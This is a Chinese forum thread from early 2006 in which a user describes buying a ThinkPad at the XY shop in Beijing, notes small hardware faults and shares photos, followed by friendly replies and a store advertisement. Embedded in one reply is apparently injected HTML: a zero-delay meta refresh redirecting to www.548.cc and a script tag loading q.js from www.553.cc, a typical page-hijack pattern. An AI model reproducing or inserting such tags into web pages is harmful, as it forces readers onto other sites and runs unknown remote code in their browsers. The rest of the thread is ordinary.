开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

终于在05年的最后一天加入了“黑社会”

05年的最后一场雪比平时来的更晚一些,早就看好XY,更看上了44U,呵呵!本来打算元旦放假去买的,怕人多货源紧张,提前问好了44U有货,于是叫上一个铁哥们(电脑水平比我高的多…)本来看过天气预报,31日是大晴天,可是出发的时候天还阴得厉害,可能这就是不顺利的预兆吧,XY开门的时间比较晚,于是先去中关村买东西,谁知道在路上就开始飘起了雪花,看样子要下很大的样子,心想这下可怎么回去啊,可是老天爷却比较吝啬,没下一会就停了,不够意思(呵呵是不是跑题了?)。
把一切事情办好就开始向日坛路进发,凭借着自己良好的位置感(大学的时候经常做同学的向导)和提前查好的行车路线,很快的到了日坛路很快的进入了安琪商务中心的五楼,可那乱码的房间号搞的人一头雾水,转了一圈找到501,敲门进去,只有PLMM在,还有几个买机器的和订货的,很热闹。不过感觉有点乱(像杂货铺)呵呵!直接问44U,回答更直接没货(当场差点晕倒),说早上买走一台还有一台发货了,又问AZ3,回答天气原因没货(差点吐血),狠狠心问那6CU呢,回答只有一台有一坏点(神那救救我吧)。低分的只有CH7,没辙好不容易跑了一趟,不想再跑一趟了(其实我住在昌平阳坊比天津的那个买本的哥哥更不容易),狠了二下心,决定买这个了,不是因为200块钱,只是因为没买到自己中意的东西,不爽。直接有货拿过一台就开始验机,速度很快一共花了1.5小时,如果人少会更快一些,旁边的那个天津哥哥可比我仔细的多,看出是个行家,还顺便借了一下他的测试软件(自己什么没带呵呵,这里表示感谢!)。自己带了现金,交钱选赠品,包装,很快就踏上了回家的路,虽然心里有些不爽,可是怎么说毕竟有了自己的“小黑”,我跟我女朋友说我现在三个 “老婆”了(大学的时候我的一个舍友把电脑当作自己的老婆),结果…….可想而知!
机器用了几天了,感觉还不错,不愧是“小黑”,给我的感觉是没买错呵呵,就是不带电源的时候,有吱吱的电流声很是讨厌;还有就是好像有点合不严,不知道别的机器是不是也有这样的毛病,当时还真没注意这点;硬盘的声音还可以接受,好像机器没有自己的杀毒软件,没发现有诺顿啊?还是自己装了一个瑞星。
    说了不少了,最后说说XY的服务,感觉不错,至少感觉买的时候很轻松,彼此都很默契,没什么多余,也不会有人在耳边唠叨,来这买本的人我想都在论坛上呆了很长时间了,所有也没有什么讨价还价的事,给XY点建议还是适当的加强一下保安措施,接近年关小心无大错呵呵!先写到这里吧,以后相信还会继续“骚扰”XY的,发几张照片,算是送给XY的新年礼物!我的序列号:NL3WBMBF,申请贵宾!

+50---EddieFan

评分

EddieFan + 30

我的数码...

<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

评分

EddieFan + 20

再发一张

还有..

正面

...

包包

包包2

自己不擅长写作和摄影,不足之处还望各位给与批评指正!呵呵,本来应该早发的,没想到这几天论坛维护只好延期了~

序列号搞错了

应该是L3WBMBF,不好意思笔误多加了一个N
贵宾已加,好图好文!!!
liux 该用户已被删除
LZ的机器似乎比别的机器更亮些。
LZ的包似乎比别的包更灿蓝些。
LZ的老婆似乎比别人更多些。
LZ家的灯泡似乎经别人家的更圆些。
LZ的贴子以乎让我更难忘些。
谢谢版主和楼上的同志呵呵!
原帖由 xian_zyc 于 2006-1-5 10:47 发表
LZ的机器似乎比别的机器更亮些。
LZ的包似乎比别的包更灿蓝些。
LZ的老婆似乎比别人更多些。
LZ家的灯泡似乎经别人家的更圆些。
LZ的贴子以乎让我更难忘些。

呵呵,不错不错,说的好啊!!!!^_^
13楼的强,呵呵
...
挺好看的阿包
dddddddddddddddddddddddddddddddddd
包包好看~